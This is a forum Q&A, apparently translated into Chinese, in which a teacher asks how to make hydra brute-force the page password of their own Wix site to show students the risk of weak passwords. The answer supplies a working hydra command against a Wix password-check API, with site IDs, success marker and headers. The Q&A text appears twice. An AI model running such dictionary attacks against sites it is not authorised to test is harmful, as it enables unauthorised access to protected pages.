Linux hydra 命令 - 破解一个简单的密码
Linux hydra command - cracking a simple password
我正在尝试编写 linux 命令以进入我创建的 Wix 网站并设置密码。我创建了这个网页,专门向我的学生展示黑客破解一个简单密码是多么容易,以及强密码的重要性。
我设置简单密码的网站是https://missyjezabel.wixsite.com/my-site
我写了下面的命令来破解密码。不幸的是,虽然它运行了,但它没有给出正确的密码。
hydra -l '' -P password.txt missyjezabel.wixsite.com http-post-form "/my-site:value=^PASS^:Please enter the correct password." -V
关于如何让它工作的任何想法?
hydra -l '' -S -V -I -P password.txt site-pages.wix.com http-post-form"/_api/wix-public-html-info-webapp/resolve_protected_page_urls?siteRevision=3:{\"password\"\:\"^PASS^\",\"pageId\"\: \"tuckg\",\"metaSiteId\"\:\"5a94dc92-9e0c-477d-81cd-d61fedbb8731\",\"siteId\"\:\"8afe215c-3003-4e5d-a0ec-bf2f36925a5c\"}:S=\"success\"\:true:H=Origin\:https\://missyjezabel.wixsite.com:H=Accept\: */*:H=Content-Type\:application/json"
该站点连接到一个 API 端点,该端点使用不同的地址来验证密码是否与给定的 site-id:
匹配
site-pages.wix.com/_api/wix-public-html-info-webapp/resolve_protected_page_urls?siteRevision=3
使用正确的 JSON 参数定位该站点:
{\"password\"\: \"^PASS^\",\"pageId\"\: \"tuckg\",\"metaSiteId\"\: \"5a94dc92-9e0c-477d-81cd-d61fedbb8731\",\"siteId\"\: \"8afe215c-3003-4e5d-a0ec-bf2f36925a5c\"}
如果密码正确,则响应包含 "success":true json 字段。
S=\"success\"\:true
还有一些必要的 headers 包括在请求中:
H=Origin\: https\://missyjezabel.wixsite.com:H=Accept\:
*/*:H=Content-Type\: application/json
对于字典攻击,password.txt 必须包含有效密码,否则它将失败。对于给定的场景,我会推荐一个简短的手动创建列表。
我正在尝试编写 linux 命令以进入我创建的 Wix 网站并设置密码。我创建了这个网页,专门向我的学生展示黑客破解一个简单密码是多么容易,以及强密码的重要性。
我设置简单密码的网站是https://missyjezabel.wixsite.com/my-site
我写了下面的命令来破解密码。不幸的是,虽然它运行了,但它没有给出正确的密码。
hydra -l '' -P password.txt missyjezabel.wixsite.com http-post-form "/my-site:value=^PASS^:Please enter the correct password." -V
关于如何让它工作的任何想法?
hydra -l '' -S -V -I -P password.txt site-pages.wix.com http-post-form"/_api/wix-public-html-info-webapp/resolve_protected_page_urls?siteRevision=3:{\"password\"\:\"^PASS^\",\"pageId\"\: \"tuckg\",\"metaSiteId\"\:\"5a94dc92-9e0c-477d-81cd-d61fedbb8731\",\"siteId\"\:\"8afe215c-3003-4e5d-a0ec-bf2f36925a5c\"}:S=\"success\"\:true:H=Origin\:https\://missyjezabel.wixsite.com:H=Accept\: */*:H=Content-Type\:application/json"
该站点连接到一个 API 端点,该端点使用不同的地址来验证密码是否与给定的 site-id:
匹配site-pages.wix.com/_api/wix-public-html-info-webapp/resolve_protected_page_urls?siteRevision=3
使用正确的 JSON 参数定位该站点:
{\"password\"\: \"^PASS^\",\"pageId\"\: \"tuckg\",\"metaSiteId\"\: \"5a94dc92-9e0c-477d-81cd-d61fedbb8731\",\"siteId\"\: \"8afe215c-3003-4e5d-a0ec-bf2f36925a5c\"}
如果密码正确,则响应包含 "success":true json 字段。
S=\"success\"\:true
还有一些必要的 headers 包括在请求中:
H=Origin\: https\://missyjezabel.wixsite.com:H=Accept\:
*/*:H=Content-Type\: application/json
对于字典攻击,password.txt 必须包含有效密码,否则它将失败。对于给定的场景,我会推荐一个简短的手动创建列表。